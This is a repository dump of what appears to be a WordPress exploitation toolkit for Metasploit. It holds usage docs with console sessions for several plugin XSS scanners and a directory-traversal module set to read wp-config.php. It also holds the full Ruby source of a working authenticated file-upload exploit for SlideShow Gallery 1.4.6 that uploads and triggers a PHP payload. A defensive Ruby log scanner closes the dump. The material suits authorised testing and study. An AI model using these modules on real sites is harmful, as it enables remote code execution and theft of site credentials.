msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) info

       Name: WordPress Ninja Forms XSS Scanner
     Module: auxiliary/scanner/http/wp_ninja_forms_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-07-14

Provided by:
  Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
  Roberto Soares Espreto

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host
  WP_PASS                     yes       A valid password
  WP_USER                     yes       A valid username

Description:
  This module attempts to exploit an Authenticated Cross-Site
  Scripting in Ninja Forms Plugin for WordPress, version 2.9.21 and
  likely prior in order if the instance is vulnerable.

References:
  https://wpvulndb.com/vulnerabilities/8128
  https://packetstormsecurity.com/files/132913/

msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set RHOSTS 10.10.10.20
RHOSTS => 10.10.10.20
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set WP_USER espreto
WP_USER => espreto
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set WP_PASS R@x0rP@55
WP_PASS => R@x0rP@55
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) run

[+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the Ninja Forms 2.9.21 plugin for WordPress
[+] Save in: /home/espreto/.msf4/local/script.html
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) firefox /home/espreto/.msf4/local/script.html
```
This will open the browser:

![XSS](../images/wp_ninja_forms_xss_scanner.png)
--------------------------------------------------------------------------------
/documentation/auxiliary/wp_database_sync_xss_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Database Sync XSS Vulnerability.

Application: WordPress Plugin 'Database Sync' 0.4
Homepage: https://wordpress.org/plugins/database-sync
Source Code: https://downloads.wordpress.org/plugin/database-sync.0.4.zip
References: https://wpvulndb.com/vulnerabilities/8127
Active Installs: 1,000+

#### Vulnerable packages*

0.4

#### Module

[wp_database_sync_xss_scanner.rb](https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wordpress/wp_database_sync_xss_scanner.rb)

#### Usage:

##### Linux (Ubuntu 14.04.2 LTS):
```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_database_sync_xss_scanner
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) show options

Module options (auxiliary/scanner/http/wp_database_sync_xss_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host
   WP_PASS                     no        A valid password
   WP_USER                     no        A valid username

msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) info

       Name: WordPress Database Sync XSS Scanner
     Module: auxiliary/scanner/http/wp_database_sync_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-08-04

Provided by:
  Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
  Roberto Soares Espreto

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
53 | RHOSTS yes The target address range or CIDR identifier 54 | RPORT 80 yes The target port 55 | TARGETURI / yes The base path to the wordpress application 56 | THREADS 1 yes The number of concurrent threads 57 | VHOST no HTTP server virtual host 58 | WP_PASS no A valid password 59 | WP_USER no A valid username 60 | 61 | Description: 62 | This module attempts to exploit an Cross-Site Scripting in Database 63 | Sync Plugin for WordPress, version 0.4 and likely prior in order if 64 | the instance is vulnerable. 65 | 66 | References: 67 | https://wpvulndb.com/vulnerabilities/8127 68 | https://packetstormsecurity.com/files/132907/ 69 | 70 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set RHOSTS 10.10.10.20 71 | RHOSTS => 10.10.10.20 72 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set WP_USER espreto 73 | WP_USER => espreto 74 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set WP_PASS R@x0rP@55 75 | WP_PASS => R@x0rP@55 76 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) check 77 | [*] 10.10.10.20:80 - The target appears to be vulnerable. 
78 | [*] Checked 1 of 1 hosts (100% complete) 79 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) run 80 | 81 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the Database Sync 0.4 plugin for WordPress 82 | [+] Save in: /home/espreto/.msf4/local/script.html 83 | [*] Scanned 1 of 1 hosts (100% complete) 84 | [*] Auxiliary module execution completed 85 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) firefox /home/espreto/.msf4/local/script.html 86 | ``` 87 | This will open the browser: 88 | 89 | ![XSS](../images/wp_database_sync_xss_scanner.png) 90 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_slideshowgallery_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info( 16 | info, 17 | 'Name' => 'WordPress SlideShow Gallery Authenticated File Upload', 18 | 'Description' => %q{ 19 | The WordPress SlideShow Gallery plugin contains an authenticated file upload 20 | vulnerability. We can upload arbitrary files to the upload folder, because 21 | the plugin also uses it's own file upload mechanism instead of the wordpress 22 | api it's possible to upload any file type. 
23 | }, 24 | 'Author' => 25 | [ 26 | 'Jesus Ramirez Pichardo', # Vulnerability discovery 27 | 'Roberto Soares Espreto ' # Metasploit module 28 | ], 29 | 'License' => MSF_LICENSE, 30 | 'References' => 31 | [ 32 | ['CVE', '2014-5460'], 33 | ['EDB', '34681'], 34 | ['WPVDB', '7532'] 35 | ], 36 | 'Privileged' => false, 37 | 'Platform' => ['php'], 38 | 'Arch' => ARCH_PHP, 39 | 'Targets' => [['WP SlideShow Gallery 1.4.6', {}]], 40 | 'DefaultTarget' => 0, 41 | 'DisclosureDate' => 'Aug 28 2014')) 42 | 43 | register_options( 44 | [ 45 | OptString.new('WP_USER', [true, 'A valid username', nil]), 46 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 47 | ], self.class) 48 | end 49 | 50 | def user 51 | datastore['WP_USER'] 52 | end 53 | 54 | def password 55 | datastore['WP_PASSWORD'] 56 | end 57 | 58 | def check 59 | check_plugin_version_from_readme('slideshow-gallery', '1.4.7') 60 | end 61 | 62 | def exploit 63 | print_status("#{peer} - Trying to login as #{user}") 64 | cookie = wordpress_login(user, password) 65 | if cookie.nil? 
66 | print_error("#{peer} - Unable to login as #{user}") 67 | return 68 | end 69 | 70 | print_status("#{peer} - Trying to upload payload") 71 | filename = "#{rand_text_alpha_lower(8)}.php" 72 | 73 | data = Rex::MIME::Message.new 74 | data.add_part("", nil, nil, 'form-data; name="Slide[id]"') 75 | data.add_part("", nil, nil, 'form-data; name="Slide[link]"') 76 | data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"') 77 | data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"') 78 | data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"') 79 | data.add_part('file', nil, nil, 'form-data; name="Slide[type]"') 80 | data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"') 81 | data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"') 82 | data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"') 83 | data.add_part("", nil, nil, 'form-data; name="Slide[order]"') 84 | data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"') 85 | data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#(unknown)\"") 86 | post_data = data.to_s 87 | 88 | print_status("#{peer} - Uploading payload") 89 | res = send_request_cgi({ 90 | 'method' => 'POST', 91 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 92 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 93 | 'vars_get' => { 94 | 'page' => 'slideshow-slides', 95 | 'method' => 'save' 96 | }, 97 | 'data' => post_data, 98 | 'cookie' => cookie 99 | }) 100 | 101 | if res 102 | if res.code == 200 103 | register_files_for_cleanup(filename) 104 | else 105 | fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") 106 | end 107 | else 108 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 109 | end 110 | 111 | print_status("#{peer} - Calling uploaded file #(unknown)") 112 | send_request_cgi( 113 | 'uri' => 
normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) 114 | ) 115 | end 116 | end 117 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_thecartpress_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin TheCartPress XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'TheCartPress' 1.3.8.2 4 | Homepage: https://wordpress.org/plugins/thecartpress/ 5 | Source Code: https://downloads.wordpress.org/plugin/thecartpress.1.3.8.2.zip 6 | References: https://wpvulndb.com/vulnerabilities/7951 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.3.8.2 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_thecartpress_xss_scanner 17 | msf auxiliary(wp_thecartpress_xss_scanner) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_thecartpress_xss_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
24 | RHOSTS yes The target address range or CIDR identifier 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | THREADS 1 yes The number of concurrent threads 28 | VHOST no HTTP server virtual host 29 | WP_PASSWORD yes Valid password for the provided username 30 | WP_USER yes A valid username 31 | 32 | msf auxiliary(wp_thecartpress_xss_scanner) > info 33 | 34 | Name: WordPress TheCartPress Plugin XSS Scanner 35 | Module: auxiliary/scanner/http/wp_thecartpress_xss_scanner 36 | License: Metasploit Framework License (BSD) 37 | Rank: Normal 38 | Disclosed: 2015-04-29 39 | 40 | Provided by: 41 | High-Tech Bridge 42 | Roberto Soares Espreto 43 | 44 | Basic options: 45 | Name Current Setting Required Description 46 | ---- --------------- -------- ----------- 47 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 48 | RHOSTS yes The target address range or CIDR identifier 49 | RPORT 80 yes The target port 50 | TARGETURI / yes The base path to the wordpress application 51 | THREADS 1 yes The number of concurrent threads 52 | VHOST no HTTP server virtual host 53 | WP_PASSWORD yes Valid password for the provided username 54 | WP_USER yes A valid username 55 | 56 | Description: 57 | This module attempts to exploit a authenticated Cross-Site Scripting 58 | in TheCartPress Plugin for WordPress, version 1.3.8.2 and likely prior 59 | in order if the instance is vulnerable. 
60 | 61 | References: 62 | http://cvedetails.com/cve/2015-3302/ 63 | http://www.exploit-db.com/exploits/36860 64 | https://wpvulndb.com/vulnerabilities/7951 65 | https://www.htbridge.com/advisory/HTB23254 66 | 67 | msf auxiliary(wp_thecartpress_xss_scanner) > show missing 68 | 69 | Module options (auxiliary/scanner/http/wp_thecartpress_xss_scanner): 70 | 71 | Name Current Setting Required Description 72 | ---- --------------- -------- ----------- 73 | RHOSTS yes The target address range or CIDR identifier 74 | WP_PASSWORD yes Valid password for the provided username 75 | WP_USER yes A valid username 76 | 77 | msf auxiliary(wp_thecartpress_xss_scanner) > set RHOSTS 192.168.1.31 78 | RHOSTS => 192.168.1.31 79 | msf auxiliary(wp_thecartpress_xss_scanner) > set WP_PASSWORD dvd43145 80 | WP_PASSWORD => dvd43145 81 | msf auxiliary(wp_thecartpress_xss_scanner) > set WP_USER espreto 82 | WP_USER => espreto 83 | msf auxiliary(wp_thecartpress_xss_scanner) > check 84 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 85 | [*] Checked 1 of 1 hosts (100% complete) 86 | msf auxiliary(wp_thecartpress_xss_scanner) > run 87 | 88 | [*] 10.10.10.20:80 - Trying to login as espreto 89 | [+] 10.10.10.20:80 - Login successful 90 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the "TheCartPress 1.3.8.2" plugin for WordPress 91 | [+] Save in: /home/espreto/.msf4/local/VMJNlBEi.html 92 | [*] Scanned 1 of 1 hosts (100% complete) 93 | [*] Auxiliary module execution completed 94 | msf auxiliary(wp_thecartpress_xss_scanner) > firefox /home/espreto/.msf4/local/VMJNlBEi.html 95 | ``` 96 | This will open the browser: 97 | 98 | ![XSS](../images/wp_thecartpress_xss_scanner.png) 99 | 100 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_gimedia_library_file_read.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin GI-Media Library File Read Vulnerability. 
2 | 3 | Application: WordPress Plugin 'GI-Media Library' 2.2.2 4 | Homepage: https://wordpress.org/plugins/gi-media-library 5 | Source Code: https://downloads.wordpress.org/plugin/gi-media-library.2.2.2.zip 6 | References: https://wpvulndb.com/vulnerabilities/7754 7 | 8 | #### Vulnerable packages* 9 | 10 | 2.2.2 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_gimedia_library_file_read 17 | msf auxiliary(wp_gimedia_library_file_read) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_gimedia_library_file_read): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | DEPTH 3 yes Traversal Depth (to reach the wordpress root folder) 24 | FILEPATH wp-config.php yes The file to read 25 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 26 | RHOSTS yes The target address range or CIDR identifier 27 | RPORT 80 yes The target port 28 | TARGETURI / yes The base path to the wordpress application 29 | THREADS 1 yes The number of concurrent threads 30 | VHOST no HTTP server virtual host 31 | 32 | msf auxiliary(wp_gimedia_library_file_read) > info 33 | 34 | Name: WordPress GI-Media Library Plugin File Read Vulnerability 35 | Module: auxiliary/scanner/http/wp_gimedia_library_file_read 36 | License: Metasploit Framework License (BSD) 37 | Rank: Normal 38 | 39 | Provided by: 40 | Unknown 41 | Roberto Soares Espreto 42 | 43 | Basic options: 44 | Name Current Setting Required Description 45 | ---- --------------- -------- ----------- 46 | DEPTH 3 yes Traversal Depth (to reach the wordpress root folder) 47 | FILEPATH wp-config.php yes The file to read 48 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
49 | RHOSTS yes The target address range or CIDR identifier 50 | RPORT 80 yes The target port 51 | TARGETURI / yes The base path to the wordpress application 52 | THREADS 1 yes The number of concurrent threads 53 | VHOST no HTTP server virtual host 54 | 55 | Description: 56 | This module exploits a directory traversal vulnerability in 57 | WordPress Plugin "GI-Media Library" version 2.2.2, allowing to read 58 | arbitrary files on WordPress directory. 59 | 60 | References: 61 | https://wpvulndb.com/vulnerabilities/7754 62 | http://wordpressa.quantika14.com/repository/index.php?id=24 63 | 64 | msf auxiliary(wp_gimedia_library_file_read) > set RHOSTS 192.168.1.31 65 | RHOSTS => 192.168.1.31 66 | msf auxiliary(wp_gimedia_library_file_read) > run 67 | 68 | [*] Downloading file... 69 | 70 | 114 | 115 | ``` 116 | --------------------------------------------------------------------------------
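A defender-side counterpart to the SlideShow Gallery upload module and the GI-Media Library file read module above, added here as an example and not part of wpsploit or Metasploit: a small Ruby pass over access-log lines that flags the two traffic shapes those modules leave behind, a PHP file requested from under `wp-content/uploads/` and a `../` sequence aimed at `wp-config.php`. The log lines are constructed, and the GI-Media Library endpoint name in them is a placeholder, since the page does not show it.

```ruby
# Added example, not project code. Flags (1) any PHP file fetched from under
# wp-content/uploads/ (the SlideShow Gallery module drops and then calls one
# there) and (2) directory traversal aimed at wp-config.php (what the
# GI-Media Library module requests with DEPTH 3).
require 'uri'

UPLOAD_PHP = %r{\A/wp-content/uploads/.+\.(php|phtml|php\d)\z}i
TRAVERSAL  = %r{(\.\./|\.\.%2f|%2e%2e/)}i

# Parse one combined-format access-log line; nil when it does not match.
def parse_line(line)
  m = line.match(/\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/)
  return nil unless m
  { ip: m[1], time: m[2], method: m[3], path: m[4], status: m[5].to_i }
end

# Return findings as [ip, rule, path] triples, in log order.
def scan_log(text)
  findings = []
  text.each_line do |line|
    req = parse_line(line.strip) or next
    path = req[:path].split('?', 2).first
    if req[:method] == 'GET' && path =~ UPLOAD_PHP
      findings << [req[:ip], 'php_in_uploads', path]
    end
    # Decode once so %2e%2e%2f-style encodings are caught as well.
    decoded = URI.decode_www_form_component(req[:path]) rescue req[:path]
    findings << [req[:ip], 'path_traversal', req[:path]] if decoded =~ TRAVERSAL
  end
  findings
end

# Constructed sample log; PLACEHOLDER.php stands in for the plugin endpoint.
SAMPLE_LOG = <<~'LOG'
  203.0.113.5 - - [04/Aug/2015:10:00:01 +0000] "POST /wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1" 200 512
  203.0.113.5 - - [04/Aug/2015:10:00:02 +0000] "GET /wp-content/uploads/slideshow-gallery/abcdefgh.php HTTP/1.1" 200 34
  198.51.100.7 - - [04/Aug/2015:10:01:00 +0000] "GET /wp-content/uploads/2015/08/photo.jpg HTTP/1.1" 200 4096
  198.51.100.9 - - [04/Aug/2015:10:02:00 +0000] "GET /wp-content/plugins/gi-media-library/PLACEHOLDER.php?file=../../../wp-config.php HTTP/1.1" 200 2048
LOG

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each { |ip, rule, path| puts "#{ip} #{rule} #{path}" }
end
```

Denying PHP execution under `wp-content/uploads/` at the web server closes the first pattern regardless of which plugin performed the upload, so a hit on that rule after such a rule is in place also indicates a server misconfiguration.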